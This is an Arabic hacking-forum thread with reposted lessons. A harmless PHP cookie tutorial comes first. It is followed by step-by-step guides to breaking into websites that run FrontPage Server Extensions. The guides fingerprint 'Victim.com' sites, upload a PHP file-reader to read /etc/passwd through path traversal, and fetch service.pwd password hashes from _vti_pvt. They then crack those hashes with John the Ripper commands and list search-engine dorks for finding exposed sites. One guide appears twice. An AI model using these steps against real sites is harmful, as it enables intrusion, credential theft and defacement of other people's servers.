" درس مفصل عن الكوكيز "
<منقول من منتديات هاكرز فلسطين>
<الكاتب: Linux Girl>
مقدمة
تعد الكعكات ( الـ ******s ) من الوسائل المفيدة في انشاء مواقع اكثر تفاعلية ، فبواسطتها ستتمكن من معرفة هل قام المتصفح بزيارة موقعك من قبل ام لا ..

في هذا الدرس سنتعرف على الكعكات و كيف يمكننا استخدامها ...

اقسام الدرس :
1- معلومات عامة .
2- زراعة الكعكات على جهاز العميل .
3- قراءة الكعكات من جهاز العميل .
4- تطبيق : تخصيص لون الخلفية .

معلومات عامة

- ما هي ملفات الكوكيز ؟
ملفات الكوكيز عبارة عن ملفات نصية ، تقوم المواقع التي تزورها بإيداعها على القرص الصلب في جهازك ، وتحتوي هذه الملفات النصية على معلومات تتيح للموقع الذي أودعها أن يسترجعها عند الحاجة ، أي عند زيارتك المقبلة للموقع .

وتختلف المعلومات التي تخزن ضمن ملفات الكوكيز من موقع لآخر ، ولكن ليس بإمكان هذه المواقع استرجاع أي معلومات إضافية عنك أو عن جهازك ، باستثناء تلك المعلومات المخزنة في الملف النصي الخاص بها ، والتي تم إرسالها من قبل الموقع ، وبذلك لا تستطيع هذه المواقع الاطلاع على مضمون ملفات الكوكيز الأخرى ، أو أي ملفات خاصة على جهازك .

- كيف يتم إيداع ملفات الكوكيز على جهازك ؟
يرسل المتصفح ، عند إدخالك عنوان موقع في شريط العناوين ، طلباً إلى الموقع الذي حددته ، متضمناً عنوان IP الخاص به ، ونوع المتصفح الذي تستخدمه ، ونظام التشغيل الذي يدير جهازك . تخزّن هذه المعلومات في ملفات خاصة بالمزود Log Files ، ولا علاقة للكوكيز بالمعلومات التي يتم إرسالها . وفي الوقت ذاته يبحث المتصفح عن ملفات كوكيز ، التي تخص الموقع المطلوب ، فإذا وجدها يتم إرسالها مع طلب مشاهدة الموقع ، وإذا لم توجد ، فإن الموقع سيدرك أن هذه زيارتك الأولى إليه ، فيقوم بإرسال ملفات الكوكيز إلى جهازك لتخزن عليه .

وبإمكان الموقع تغيير المعلومات الموجودة ضمن ملفات الكوكيز أو إضافة معلومات جديدة كلما قمت بزيارة الموقع . يتم تخزين بعض ملفات الكوكيز في الذاكرة فقط ، بحيث يجري حذفها مباشرة عند إغلاقك المتصفح ، ولكن معظمها وتسمى "ملفات الكوكيز المثابرة"، يتم تخزينها لفترة محددة على القرص الصلب لحين انتهاء صلاحيتها وقد تدوم صلاحيتها مدة أشهر أو حتى سنوات . أما بعض ملفات الكوكيز التي تعرض تاريخ صلاحية لتاريخ سابق ، فإنها تُحذف مباشرة ولا تُخزَّن على قرصك الصلب . وتعود المعلومات المخزنة في ملفات الكوكيز إلى مزودات الموقع الذي أصدرها فقط ، وقد تعمم بعض الشركات الكبرى ملفات الكوكيز التي تصدرها على جميع مزوداتها ، لتنسيق المعلومات المتضمنة ، ولكي لا تصدر كل من مزوداتها ملفات كوكيز للمستخدم ذاته ، عند زيارته لصفحات مختلفة في الموقع .

- مكونات ملف الكوكيز :
يتكون عادة من عدة اجزاء هي اسم الملف ، قيمته ، تاريخ انتهاء مفعوله ، الموقع المالك له ...

زراعة الكعكات على جهاز العميل

أولا : كيف تزرع ملفات الكعكات :
يتم ذلك باستخدام الدالة set****** و تعريفها بالشكل التالي :

code:
________________________________________


boolean set****** ( string name [, string value [, int expire

[, string path [, string domain [, int secure]]]]])



________________________________________


تهمنا المدخلات الثلاث الاولى و هي :
name : اي اسم الكعكة ... فبامكانك ارسال اكثر من كعكة الى متصفح واحد و عندها يصبح الاسم هو الطريقة الوحيدة للتمييز .

value : القيمة ... فقط قيم نصية ... لا يمكنك وضع مصفوفة كقيمة و هذا أامر مهم ... لكن انتبه بامكانك وضع مصفوفة لكن بطريقة اخرى ... ؟ كيف ؟ : استخدم الدالة serialize لتحويل اي متغير في بي اتش بي الى شكل نصي و من ثم استخدم unserialize لاعادته الى الشكل الطبيعي .

expire : اي عدد الثواني من بدية عصر اليونكس ( 1 يناير 1970 ) و التي بعدها سيقوم المتصفح على جهاز المستخدم بحذف الكعكة ... و هنا ثلاث حالات :
--> أولاً : أن يكون الوقت المعطى كمدخل اكثر من الوقت الحالي على جهاز العميل و عندها تخزن الكعكة على جهاز العميل و تحذف عند انقضاء المدة .
--> ثانياً : أن يكون الوقت المعطى كمدخل اقل من الوقت على جهاز العميل و عندها لا يقوم المتصفح على جهاز العميل بتخزينها و اذا وجدت كعكة بنفس الاسم فانه يحذفها حتى لو لم تنتهي المدة .
--> ثالثاً : إذا لم تحدد وقتا فان الكعكة تخزن في ذاكرة المتصفح و تفقد حالما يغلق المستخدم الموقع .

مثال :
code:
________________________________________
<?

set******('site','http://www.palhackerz.com/',time()+3600);

?>
________________________________________


من الدوال المفيدة دالة time و التي ترجع الوقت الحالي على شكل عدد الثواني من بداية عصر اليونكس (1 يناير 1970) .

ثانيا كيف تحذف او تعدل كعكة:
لكي تحذف كعكة عليك أن ترسل كعكة بنفس الاسم و خالية القيمة و ذات وقت اقل من الوقت على جهاز المستخدم

مثال :
code:
________________________________________
<?

set******('site','',time()-360000);

?>
________________________________________


ملاحظات :
1- عندما تحدد زمنا ماضياً اجعله قيمة كبيرة لكي تتفادى فارق التوقيت بين الخادم و العميل .
2- لكي تعدل أي كعكة عليك حذفها و إرسالها من جديد .

ملاحظة مهمة :
يجب ان تستدعي الدالة set****** قبل أن ترسل اي شيء الى المتصفح .. فمثلا الكود التالي لن ينجح :
code:
________________________________________
<html>

<body>

<?

set******('site','palhackerz.com',time()+20000);

echo " Alfjr.com : the best islamic forum";

?>

</body>

</html>

________________________________________


بل لو كان هنالك مجرد سطر فارغ قبل علامة البداية ?> فلن تعمل الدالة set****** ...

المثال السابق كان من الممكن ان يكون :
code:
________________________________________
<? set******('site','palhackerz.com',time()+20000);

?>

<html>

<body>

<? echo " palhackerz.com : the best Hacking forum"; ?>

</body>

</html>

________________________________________



قراءة الكعكات من جهاز العميل

- كيف تستقبل المتغيرات من الكعكة :
كما قلنا بانه بامكانك ارسال اكثر من كعكة الى متصفح واحد ..
عندما يطلب المستخدم من متصفحهِ صفحة على موقعك فان المتصفح يقوم بارسال جميع الكعكات التي قمت انت بزراعتها عند المستخدم ... PHP تسهل عليك قراءة هذه الكعكات و تخزنها في مصفوفة اسمها ******_$ و هي مصفوفة من النوع Associative Arrays بحيث ان المفتاح هو اسم الكعكة و القيمة قيمة الكعكة كما ارسلتها .

مثال :
code:
________________________________________
<?

echo $_******['site'];

?>
________________________________________


و هذه تطبع :
code:
________________________________________
palhackerz.com
________________________________________
تطبيق : تخصيص لون الخلفية
كمثال بسيط دعنا نقوم بانشاء موقع مبسط و نستخدم الكعكات لكي نحفظ لون الخلفية المحببة الى الشخص ..

- ماذا لدينا ؟
1- الملف user.php : يقوم الملف بعمليتين :
--> الاولى : تحديد اللون الذي اختاره الزائر .
--> الثانية : عرض نموذج اختيار الللون و حفظ اللون المختار

2- الملف index.php إحدى صفحات الموقع و التي تستفيد من خدمات الملف user.php .

وإليك الكود الخاص بكل ملف :
1- الملف user.php :
code:
________________________________________
<?

/*-----------------------

******s-Based Background Selector..

Created By : "Rasha"<[email protected]>

For : h4palestine.com

-------------------------*/



function display_form(){

?>

<html>

<body>

<!-- Color setting Form -->

<form name=color_select method="GET">

<INPUT type="hidden" name="do" value="set_color">

<INPUT name="color" type="text" value="

<? echo get_color(); ?>">

<INPUT type="submit" value="احفظ اللون">

</FORM>

<!-- Color Clearing Form -->

<form name=color_clear method="GET">

<INPUT type="hidden" name="do" value="clear_color">

<INPUT type="submit" value="لا تتذكر لوني المفضل">

</FORM>

<?



}



function set_color(){

global $_GET;

set******('color',$_GET['color'],time()+36000);

header('Location:index.php');



}



function get_color(){

global $_******;

if(isset($_******['color'])){

return $_******['color'];

}else{

return "#FFFFFF";

}

}



function clear_color(){

set******('color',$_GET['color'],time()-36000);

header('Location:index.php');

}



// selection



if ($do=='display_form'){

display_form();

}elseif ($do=="set_color"){

set_color();

}elseif ($do=="clear_color"){

clear_color();

}

?>
________________________________________


- الدالة الاولى display_form تقوم فقط بعرض نموذج اختيار اللون .
- الدالة الثانية set_color تقوم بحفظ اللون المختار في كعكة و ترجع المستخدم الى الصفحة الرئيسية .
- الدالة الثالثة get_color ترجع قيمة اللون من الكعكة و اذا لم يكن هنالك قيمة فانها ترجع لون افتراضي وهو الابيض .
- الدالة الرابعة clear_color تقوم بمسح الكعكة بالطريقة التي ذكرناها في الدرس .

2- ملف الـ index.php :
ملف عادي جداً الا انه يطلب الدالة get_color من ملف user.php كما يلي :
code:
________________________________________
<html>

<BODY bgcolor="<? include('user.php');

echo get_color() ?>">

<h1>مرحبا بك .....</h1>

<br>

يمكنك تخصيص لون الخلفية من هنا

<br>



<a href="user.php?do=display_form"> صفحة تخصيص اللون</a>

</body>

</html>

________________________________________

انتهى،،،
__________________
[align=center][glint]لا إله إلا الله محمداً رسول الله[/glint]
[caution]لا إله إلا الله محمداً رسول الله
سبحان الله و بحمده ... سبحان الله العظيم
اللهم قني عذاب جهنم و عذاب القبر و فتنة المحيى و الممات و شر فتنة المسيح الدجال ... آمين [/caution]
[/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]

[email protected]
Syrian Hacker غير متصل  
قديم 16-02-2008, 02:23   #14
:: عضو مميز ::
 
الصورة الرمزية Syrian Hacker
 
تاريخ التسجيل: Feb 2008
الدولة: System32\Config\SAM
المشاركات: 112
" معلومات مهمة عن المواقع التي تدعم الفرونت بيج "
<منقول>
<الكاتب: T.O.L. ( DeXXa ) .>
ما الذي يجب أن تعرفه قبل قراءة هذا الدرس :

* الالمام بالانجليزية .
* قراءة المزيد عن الـ FrontPage Server Extensions و ليس كيفية اختراقه .
* كيفية التعامل مع برنامج Microsoft Office FrontPage .
* كيفية التعامل مع الـ CHMOD .
* كيفية التعامل مع الـ Telnet .
* كيفية التعامل مع بروتوكول HTTP .
* كيفية التعامل مع قواعد البيانات العلائقية SQL .
* كيفية التعامل مع أحد لغات الويب و التي تعمل بناحية الخادم Server Side Scripting Language .

و اذكر أخيراً بأني اؤمن بأن المخترق ما هو إلا انسان وظيفته البرمجة و ادارة و تحليل النظم و الشبكات و ليس انسان همه هو معرفة القليل
من الأمور التي تساعده في التخريب و العبث بما تعب به الآخرون و تضييع الوقت في الدردشة و التسكع بمقاهي الانترنت ، و لذا فافترض بأن
ما أقوله سيكون واضحاً و لا يحتاج لـ Screen Capture .

@ خريطة الموضوع :

. ما الذي ستسفيده عند قراءة الموضوع ؟
. مقدمة
. ما هو الـ FrontPage Server Extensions ؟
. ما هي آلية عمل الـ FrontPage Extension Server ؟
. كيفية الاتصال بـ FrontPage Extension Server
. كيفية معرفة هل الموقع يدعم الـ FrontPage أم لا
. كيفية استغلاله ليصبح في صلاحك


@ ما الذي ستستفيده عند قراءتك للموضوع ؟

* ستعرف ما هو الـ FrontPage Server Extensions .
* آلية عمله .
* كيفية جمع المعلومات الخاصة بأي موقع .
* بعض الطرق للاستفادة منه عند الاتصال بالخادم الخاص به .

@ مقدمة :

تسعى شركات التسكين بأنواعها توفير شتى شبل الراحة لعملائها ، فتجدهم يقدمون العروض و التخفيضات لارضاء العملاء مثل دعم لـ PHP و
CGI و Perl و SSL و FTP و SQL .

و بالنسبة لمدارء المواقع Webmasters فإن البرنامج المفضل لهم لتصميم مواقعهم هو Microsoft Office FrontPage و الذي كما هو مبين يأتي
مع حزمة Office ، اذ يتميز بسهولة استعماله كما انه يوفر بعض البرمجيات مثل عداد الزوار ، و لذا تقدم شركات التسكين دعم كامل للبرنامج .

@ ما هو الـ FrontPage Server Extensions ؟

( ملاحظة : سأتكلم حالياً عن الحزم التي أتت بعد حزمة الاصدار الثاني )

هو عبارة عن حزمة من البرامج يتم تثبيتها في الخادم Server الخاص بشركة التسكين التي لها قالبية لدعم بعض الخصائص .

و عند التثبيت يجب انشاء عدة مجلدات منها :

/_private
/_vti_bin
/_vti_cnf
/_vti_log
/_vti_pvt
/_vti_txt

و سأتكلم عن وظيفة كل مجلد يهمنا :

* المجلد _vti_bin :

و يتواجد بداخله مجلدان هما :

( ملاحظة : النقطتان تشيران إلى المجلد _vti_bin )

../_vti_adm/
../_vti_aut/

الثاني لا يهمنا بقدر ما يهم المجلد الأول اذ أنه الخاص بالمشرف ولا تستطيع الاستفادة منه اذا لم تحصل على كلمة المرور الخاصة به .
كما يوجد ملفان هما :

../shtml.exe
../fpcount.exe

* المجلد _vti_pvt :

و يتواجد بداخله عدة ملفات ما يهمنا منها هو الملفات التالية :

- الملف service.pwd : و فيه يتواجد المعرف و كلمة المرور الخاصة بالمشرف مشفرة بمقياس DES .
- الملف service.grp : و فيه يتواجد المعرفين من مشرفين و authors .
- ملفي deptodoc.btr و doctodep.btr : و فيه يتواجد مسارات الملفات التي تم تحميلها على الخادم ، فاذا قمت بتنزيله فتستطيع معرفة الملفات
الموجودة بالموقع .

و في الغالب لا تستطيع معاينة محتويات المجلد اذ يوجد في المجلد الرئيسي للموقع ملف .htaccess يقوم بمنع الجميع ( المالك و المجموعة و
الزوار ) من معاينة المجلد و محتوياته .

( ملاحظة : ان عدم وضع أي صلاحية على المجلدلا يعني بأنها تعتبر ثغرة و لكن ضعف من الناحية )

* المجلد _private :

و يتواجد بداخله ملف واحد فقط هو .htaccess .

@ ما هي آلية عمل الـ FrontPage Extension Server ؟

يعتمد الاتصال بين العميل و الـ FrontPage Extension Server على بروتوكول الـ HTTP .

فلو اردنا معاينة عداد الزوار عن طريق برنامج الـ FrontPage فانه يتم ارسال طلب Request للخادم ثم يمرره الخادم بالـ FrontPage Extension Server
و الذي يمرره بالتالي ببرمجيات الخادم مثل fpcount.exe ، و من ثم يكرر تمريره مرة أخرى إلى الـ Extension Server و إلى الخادم و يظهر المخرجات
لـ العميل ، علماً ان هذه الاتصالات تتم عبر جدار نار .

@ كيفية الاتصال بـ FrontPage Extension Server :

كما ذكرنا سابقاً ان أغلب شركات التسكين تسعى لراحة العملاء ، فتجدها تدعم خدمة الـ FrontPage و ذلك لتحميل الصفحات للموقع علماً بأنها
تدعم بروتوكول الـ FTP و تحميل الملفات و انشاء المجلدات عبر المتصفح اعتماداً على البرمجيات التي تعمل بناحية الخادم .
و الآن قم بتنفيذ التالي لمعرفة كيفية الاتصال بالـ FrontPage Extension Server :

( ملاحظة : سأتكلم حالياً عن حزمة الـ XP و التي لا تختلف أبداً عن الحزم الباقية إلا في بعض النقاط الشكلية )

* قم بتشغيل برنامج الـ FrontPage و الذي يأتي مرفقاً مع حزمة Office .
* من قائمة File قم باختيار Open Web .
* قم باضافة المعرف و كلمة المرور ( الأصلية و ليست المشفرة ) .
* اذا كانت صحيحة سيظهر لك الخادم ملفات الموقع كلها و عندها تستطيع التحميل و التعديل في الملفات و المجلدات و معاينة الشفرة المصدرية
للملفات .
* اذا لم تتم العملية بنجاح فهذا يعني بأن الموقع لا يدعم الخدمة أو أن المعرف أو كلمة المرور خاطئة و يطلب منك معاينتها في وضعية القراءة و لا
يظهر لك الشفرة المصدرية الأصلية ولا المجلدات و الملفات التي يحويها الموقع .

@ كيفية معرفة هل الموقع يدعم الـ FrontPage أم لا :

يوجد العديد من الطرق لمعرفة قابلية الموقع لدعم الفرونت بيج نذكر منها :

* معاينة ملف نجاح التثبيت :

( ملاحظة : قد لا تجد ملف _vti_inf.html و لكن هذا لا يعني أن الموقع لا يدعم الخدمة ، كما أنه لا يعتبر ثغرة )

- قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ FrontPage أم لا .
- قم بمعانية ملف _vti_inf.html بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ، مثال :

http://www.Victim.com/_vti_inf.html

- و عند معاينة الصفحة ستجد جملة FrontPage Configuration Information ، فهذا معناه أن حزمة الـ FrontPage Extension Server قد تم تثبيتها
في الخادم بنجاح .

و لمعرفة اصدارة الخدمة قم بالتالي :

- قم بالنقر بزر الفأرة الأيمن على الصفحة ، ثم قم باختيار Source Code .
- قم بالبحث عن FPVersion="Version" حيث Version تشير للاصدار الخاص بالخدمة .

* عن طريق مجلد _vti_cnf :

- قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ FrontPage أم لا .
- قم بمعانية المجلد بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ، مثال :

http://www.Victim.com/_vti_cnf

- قم بالنقر بزر الفأرة الأيمن على الصفحة ، ثم قم باختيار Source Code .
- قم بالبحث عن الشفرة التالية :

vti_generator:Programe

- حيث Programe يشير لنوع البرنامج و اصدارته و سيكون في حالتنا هو Microsoft FrontPage X و الاصدارة الخاصة به هي X .

* الكشف عن الشفرة المصدرية للصفحة :

- قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ FrontPage أم لا .
- قم بالنقر بزر الفأرة الأيمن على الصفحة ، ثم قم باختيار Source Code .
- قم بالبحث بين ترميزي الرأس <Head></Head> عن الشفرة التالية :

<**** Name="GENERATOR" &@#&@#&@#&@#&@#&@#&@#="Programe">

- حيث Programe يرمز لنوع البرنامج و اذا كان البرنامج هو Microsoft FrontPage X.0 يتبين لنا بأن الخادم الخاص بالموقع يدعم الفرونت بيج و
الاصدارة الخاصة به هي X .

* عن طريق موقع NetCraft :

- قم بزيارة الموقع NetCraft.net .
- قم بكتابة عنوان الموقع مستثنياً الـ http:// .
- انتظر بضع ثواني .
- ستجد أن الموقع أعطاك بعض المعلومات عن الملقم و الخدمات الموجودة في الموقع الذي تريد معرفة قابلية دعمه للبرنامج ، و من تلك الخدمات
خدمة الـ FrontPage و ستظهر لك بالشكل mod_frontpage/X حيث X يرمز لاصدارة الـ FrontPage Extensions Server .

* عن طريق الـ Telnet :

( ملاحظة : تساعد هذه الطريقة في معرفة بعض المعلومات عن الخادم و المخرجات هي نفس مخرجات الطريقة السابقة )

- من قائمة Start قم باختيار Run و اكتب بالنافذة التي ستظهر Telnet .
- قم بالاتصال بالموقع عبر المنفذ 80 بالشكل التالي :

Microsoft Telnet> Open www.Victim.com 80

- قم بارسال طلب Request للخادم و لتكن الطريقة Method هي Head .

( ملاحظة : عليك الالمام بكيفية التعامل مع بروتوكول HTTP )

- قم بارسال التالي حيث http://www.Victim.net هو الموقع الضحية و ISP.net هو البروكسي الخاص بمزود الخدمة الخاص بك :

Head www.Victim.net HTTP/1.1
Host: ISP.net
Accept: */*
Connection: close

- انتظر بضع ثواني .
- ستستلم الاجابة Response عن الطلب الذي ارسلتهب للخادم Server مثل تاريخ آخر تعديل للصفحة و نوع الملقم و الخدمات المتوفرة به .
و من ضمن الخدمات ستجد نفس الذي وجدناه في الطريقة السابقة و هو أن خدمة الـ FrontPage و ستظهر لك بالشكل mod_frontpage/X
حيث X يرمز لاصدارة الـ FrontPage Extensions Server .

@ كيفية استغلاله ليصبح في صالحك :

اذا عثرت على موقع يدعم هذه الخدمة و لم يتم وضع صلاحيات على مجلد الـ _vti_pvt قم بالتالي :

( ملاحظة : عليك الالمام بلغة تعمل على ناحية الخادم و في حالتنا فهي الـ PHP ، كما أن على الموقع الضحية دعم هذه اللغة )

* قم بالاتصال بالموقع الضحية .
* قم بتحميل ملف ينتهي امتداده بـ PHP و ضمنه التالي :

<?PHP

$open = FOpen($file, "r");
$get = FGets($open, FileSize($file));

Echo $get;

FClose $open;

?>

و قمنا هنا برفع ملف PHP للخادم يقوم بفتح ملف غير معين ثم يحضر محتوياته على حسب حجمه بالبايت ثم يعرضه ثم يغلق الملف ، و الآن كل
ما عليك فعله الآن هو الدخول على الموقع عبر المتصفح و الحاقه بـ بعنوان الملف الذي حملته و المتغير file و الملف الذي تريد معاينة الشفرة
المصدرية الخاصة به ، مثال :

http://www.Victim.com/uploded_file...../../etc/passwd

حيث uploded_file يشير لاسم الملف الذي قمت بتحميله ، و تستطيع اضافة اوامر تسمح لك بمعاينة الملفات و المجلدات الموجودة في الخادم .

انتهى،،،


" اختراق المواقع التي تدعم الفرونت بيج "

<منقول من منتدى إعصار>
<الكاتب: المدمر>

اكثر منا يعلم ان هذه الثغرة خاصة بنظام//

NT - Unix

1- وسف أقوم الآن بشرح طريقة لمعرفة هل هذه المواقع تدعم frontpage أم لا؟

بعدة طرق ولن أذكر إلا الأسهل:

- بالذهاب إلى موقع netcraft
http://www.netcraft.com/
وكتابة اسم الموقع وبعد البحث سوف يظهر
mod_frontpage/x
x=(رقم الإصدار الخاص بالفرونت بيج)
- عن طريق إضافة جملة
vti_inf.html_/
بعد عنوان الموقع لنفرض أن الموقع:http://www.almodammer.com/
نضيف الجملة ليصبح بهذه الطريقة
http://www.almodammer.com/_vti_inf.html
وبعدها اضغط Enter
وراح يطلعلك في أول الصفحة هذه الكلمة
Frontpage Configuration Information
أي قد تم تثبيت مجلدات وبرامج الفرونت بيج
- وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم لا
بإضافة
vti_cnf_/
بعد عنوان الموقع كهذا المثال:
http://www.almodammer.com/_vti_cnf
واضغط زر الفأرة الأيمن واختار
source المصدر
وابحث عن
vti_generator:Programe
حيث
Programe تعني لنوع برنامج الفرونت بيج والإصدارات الخاصة به

--------------------------------------------------

2- ألحين وعرفنا الموقع يدعم frontpage كيف نقدر نوصل لملف الباسوورد؟
بسيطة إنت هات الموقع الي يبدعم frontpage واعلمك
يعني وعلى سبيل المثال
http://www.almodammer.com/
يدعم fontpage طيب نذهب إلى ملف vti_pvt_
كذا يعني
http://www.almodammer.com/_vti_pvt
وأول ماندخله نلاحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:
=============
Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
=============

ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلاحظ نلاحظ وجود
username:passwd
اسم المستخدم والباسوورد
يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات طلعلي ملف service يحتوي على user / password
وهذا مضمون الملف
operator:hi9LHn9wAMuKM
حيث اسم المستخدم:operator
الباسوورد المشفرة هي:hi9LHn9wAMuKM

ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إلا نفك تشفيره
وهذا يتم ببرامج كثير
=(Crack Jack)=
=(John The Ripper)=

راح نستخدم الأفضل والأكثر تداولا وهو
John The Ripper
لتحميل البرنامج من هذا الموقع::
http://www.openwall.com/john

كيف تفك التشفير بهذا البرنامج

أول شي تروح تنقل البرنامج إلى مجلد
\:c
بعدين تفتح مجلد RUN
وتسويلك مستند نصي txt وتسمي الملف passwd وتضع فيه كلمة السر الي تبي تفك تشفيرها
إذهب إلى
ابدأ start
تشغيل run
اكتب الأمر
command
اضغط على Enter وبعدها راح يفتح
إطار الـDoS
اذهب إلى مجلد RUN
وذلك بالخروج من المجلدات الي راح تظهر لك واذا تبي تطلع من أي مجلد استخدم الأمر
..cd
حتى توصل
<\:c
بعدين اكتب
cd john
اضغط على Enter
وراح يظهر لك بهذا الشكل
<c:\john
واكتب
cd RUN
وبتدخل المجلد ليصبح بهذه الطريقة
<c:/john/RUN
ألحين نكتب أوامر برنامج John The Ripper
وهي
====
john -i:all passd.txt
--------------------------
يبحث لك عن جميع الأنواع والاحتمالات

====
john -i:Alpha passwd.txt
----------------------------------
يبحث عن الأحرف الصغيرة

====
john -i:Digits passwd.txt
----------------------------------
يبحث عن الأرقام

====
john -single passwd.txt
---------------------------------
أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم

--------------------------------------------------------------------------------
وبعد ماتجرب كل هذي الأوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ولا لأ إذهب إلى
john.pot
الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها
--------------------------------------------------------------------------------

إنت ألحين مستريح عندك username والـpassword
وش بقالك ؟!!

يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/
(1)
frontpage
بعدين
file وتذهب إلى
open web وتضيف
الاسم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك

(2)
من FTP
وعليك ببرامج الـFTP المنتشرة
كالـws-ftp
والـpro ftp
والمزيد ...
ويمكنك عمل الطريقة من DOS ولكن البرامج أسهل لك وأضمن لك

======================================

وألحين أكيد تبون تجربون على موقع أقولكم روحوا google
http://www.google.com/
واكتبوا في إطار البحث
vti_pvt_/
وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة

وعندك محرك بحث
http://www.altavista.com/
تكتب في محرك البحث
link:service.pwd

أو..
link:adminstrators

وغيرها من الملفات الاحتمال وجود password فيها.

انتهى،،،


" اختراق المواقع التي تدعم الفرونت بيج "

<منقول من منتدى إعصار>
<الكاتب: المدمر>

اكثر منا يعلم ان هذه الثغرة خاصة بنظام//

NT - Unix

1- وسف أقوم الآن بشرح طريقة لمعرفة هل هذه المواقع تدعم frontpage أم لا؟

بعدة طرق ولن أذكر إلا الأسهل:

- بالذهاب إلى موقع netcraft
http://www.netcraft.com/
وكتابة اسم الموقع وبعد البحث سوف يظهر
mod_frontpage/x
x=(رقم الإصدار الخاص بالفرونت بيج)
- عن طريق إضافة جملة
vti_inf.html_/
بعد عنوان الموقع لنفرض أن الموقع:http://www.almodammer.com/
نضيف الجملة ليصبح بهذه الطريقة
http://www.almodammer.com/_vti_inf.html
وبعدها اضغط Enter
وراح يطلعلك في أول الصفحة هذه الكلمة
Frontpage Configuration Information
أي قد تم تثبيت مجلدات وبرامج الفرونت بيج
- وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم لا
بإضافة
vti_cnf_/
بعد عنوان الموقع كهذا المثال:
http://www.almodammer.com/_vti_cnf
واضغط زر الفأرة الأيمن واختار
source المصدر
وابحث عن
vti_generator:Programe
حيث
Programe تعني لنوع برنامج الفرونت بيج والإصدارات الخاصة به

--------------------------------------------------

2- ألحين وعرفنا الموقع يدعم frontpage كيف نقدر نوصل لملف الباسوورد؟
بسيطة إنت هات الموقع الي يبدعم frontpage واعلمك
يعني وعلى سبيل المثال
http://www.almodammer.com/
يدعم fontpage طيب نذهب إلى ملف vti_pvt_
كذا يعني
http://www.almodammer.com/_vti_pvt
وأول ماندخله نلاحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:
=============
Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
=============

ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلاحظ نلاحظ وجود
username:passwd
اسم المستخدم والباسوورد
يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات طلعلي ملف service يحتوي على user / password
وهذا مضمون الملف
operator:hi9LHn9wAMuKM
حيث اسم المستخدم:operator
الباسوورد المشفرة هي:hi9LHn9wAMuKM

ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إلا نفك تشفيره
وهذا يتم ببرامج كثير
=(Crack Jack)=
=(John The Ripper)=

راح نستخدم الأفضل والأكثر تداولا وهو
John The Ripper
لتحميل البرنامج من هذا الموقع::
http://www.openwall.com/john

كيف تفك التشفير بهذا البرنامج

أول شي تروح تنقل البرنامج إلى مجلد
\:c
بعدين تفتح مجلد RUN
وتسويلك مستند نصي txt وتسمي الملف passwd وتضع فيه كلمة السر الي تبي تفك تشفيرها
إذهب إلى
ابدأ start
تشغيل run
اكتب الأمر
command
اضغط على Enter وبعدها راح يفتح
إطار الـDoS
اذهب إلى مجلد RUN
وذلك بالخروج من المجلدات الي راح تظهر لك واذا تبي تطلع من أي مجلد استخدم الأمر
..cd
حتى توصل
<\:c
بعدين اكتب
cd john
اضغط على Enter
وراح يظهر لك بهذا الشكل
<c:\john
واكتب
cd RUN
وبتدخل المجلد ليصبح بهذه الطريقة
<c:/john/RUN
ألحين نكتب أوامر برنامج John The Ripper
وهي
====
john -i:all passd.txt
--------------------------
يبحث لك عن جميع الأنواع والاحتمالات

====
john -i:Alpha passwd.txt
----------------------------------
يبحث عن الأحرف الصغيرة

====
john -i:Digits passwd.txt
----------------------------------
يبحث عن الأرقام

====
john -single passwd.txt
---------------------------------
أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم

--------------------------------------------------------------------------------
وبعد ماتجرب كل هذي الأوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ولا لأ إذهب إلى
john.pot
الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها
--------------------------------------------------------------------------------

إنت ألحين مستريح عندك username والـpassword
وش بقالك ؟!!

يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/
(1)
frontpage
بعدين
file وتذهب إلى
open web وتضيف
الاسم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك

(2)
من FTP
وعليك ببرامج الـFTP المنتشرة
كالـws-ftp
والـpro ftp
والمزيد ...
ويمكنك عمل الطريقة من DOS ولكن البرامج أسهل لك وأضمن لك

======================================

وألحين أكيد تبون تجربون على موقع أقولكم روحوا google
http://www.google.com/
واكتبوا في إطار البحث
vti_pvt_/
وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة

وعندك محرك بحث
http://www.altavista.com/
تكتب في محرك البحث
link:service.pwd

أو..
link:adminstrators

وغيرها من الملفات الاحتمال وجود password فيها.

انتهى،،،
__________________
[align=center][glint]لا إله إلا الله محمداً رسول الله[/glint]
[caution]لا إله إلا الله محمداً رسول الله
سبحان الله و بحمده ... سبحان الله العظيم
اللهم قني عذاب جهنم و عذاب القبر و فتنة المحيى و الممات و شر فتنة المسيح الدجال ... آمين [/caution]
[/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]
